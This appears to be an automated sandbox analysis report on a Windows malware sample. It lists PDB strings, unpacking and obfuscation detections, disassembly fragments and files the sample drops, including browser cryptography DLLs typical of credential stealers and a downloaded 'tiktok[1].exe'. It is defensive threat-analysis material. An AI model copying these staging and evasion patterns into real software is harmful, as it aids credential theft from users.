Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930249216.0000014801D60000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977808405.000001481A5C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000002.00000002.1866854377.0000000002D83000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1870056905.0000000004340000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1870610192.00000000046F7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2128198720.0000000004EF4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129728205.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2099731858.0000000004250000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2100503302.0000000004704000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2099077107.000000000313E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301263248.0000000004884000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301615939.0000000004D60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: mozglue.pdb source: u5g0.0.exe, 00000001.00000002.2101479423.000000006CB0D000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000002.00000002.1863624775.0000000000A6C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000000.1804255614.0000000000A6C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2035551814.0000000000A6C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2095606021.0000000000A6C000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3014494109.000001481B2E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3015127301.000001481B330000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2929673982.0000014801D20000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000002.00000002.1871536669.000000006C967000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000D.00000002.2101364592.000000006D007000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930005185.0000014801D50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3015127301.000001481B330000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2929734061.0000014801D30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2929734061.0000014801D30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2929808370.0000014801D40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2929808370.0000014801D40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000002.00000002.1866854377.0000000002D83000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1870056905.0000000004340000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1870610192.00000000046F7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2128198720.0000000004EF4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129728205.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2099731858.0000000004250000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2100503302.0000000004704000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2099077107.000000000313E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301263248.0000000004884000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301615939.0000000004D60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3014582028.000001481B2F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811DEC000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2987654974.000001481AB50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E4E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: nss3.pdb source: u5g0.0.exe, 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Unpacked PE file: 0.2.R0hb7jyBcv.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Unpacked PE file: 1.2.u5g0.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Unpacked PE file: 0.2.R0hb7jyBcv.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Unpacked PE file: 1.2.u5g0.0.exe.400000.0.unpack

.NET source code contains potential unpacker

Source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481abd0000.18.raw.unpack, TelemetryConfigurationFactory.cs

.Net Code: LoadInstance

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Code function: 1_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00416240

Source: relay.dll.0.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: IIIJECAEGD.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x8897e
Source: relay.dll.2.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: qbji.3.dr	Static PE information: real checksum: 0x0 should be: 0xc411c
Source: tiktok[1].exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x8897e
Source: R0hb7jyBcv.exe	Static PE information: real checksum: 0x74472 should be: 0x74478

Source: u5g0.3.exe.0.dr	Static PE information: section name: .didata
Source: freebl3.dll.1.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr	Static PE information: section name: .didat
Source: nss3.dll.1.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.1.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_0042786C push ecx; ret	0_2_0042787C
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_0042780C push eax; ret	0_2_0042782A
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_0042E3A5 push esi; ret	0_2_0042E3AE
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_00409D06 push ecx; ret	0_2_00409D19
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_004097B6 push ecx; ret	0_2_004097C9
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_008F4193 push 2B991403h; ret	0_2_008F419A
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_008F4AB9 push 00000061h; retf	0_2_008F4AC1
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_008F1BFB pushad ; retf	0_2_008F1BFC
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_008F2C90 push ecx; iretd	0_2_008F2C96
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_008F44A9 pushad ; retf	0_2_008F44B0
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_008F5F1B push ebp; iretd	0_2_008F5F4E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_02507A73 push eax; ret	0_2_02507A91
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024E9A1D push ecx; ret	0_2_024E9A30
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_02501B72 push dword ptr [esp+ecx-75h]; iretd	0_2_02501B76
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024FC3FF push esp; retf	0_2_024FC407
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024FC9FD push esp; retf	0_2_024FC9FE
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024E9F6D push ecx; ret	0_2_024E9F80
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_004176C5 push ecx; ret	1_2_004176D8
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_00A2FAB6 push ecx; ret	2_2_00A2FAC9
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_008CDA12 push 8B00A9D1h; retf	2_2_008CDA17
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_00A2FB55 push ecx; ret	2_2_00A2FB68
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_008E0F0B push 8B00A9D1h; retf	2_2_008E0F10
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_6C9447D9 push ecx; ret	2_2_6C9447EC
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_6C946365 push ecx; ret	2_2_6C946378

Source: qbji.3.dr

Static PE information: section name: .text entropy: 6.816444465715168

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	File created: C:\Users\user\AppData\Local\Temp\u5g0.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\qbji	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\phtshfcnnluilu	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	File created: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	File created: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	File created: C:\Users\user\AppData\Local\Temp\u5g0.2\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	File created: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
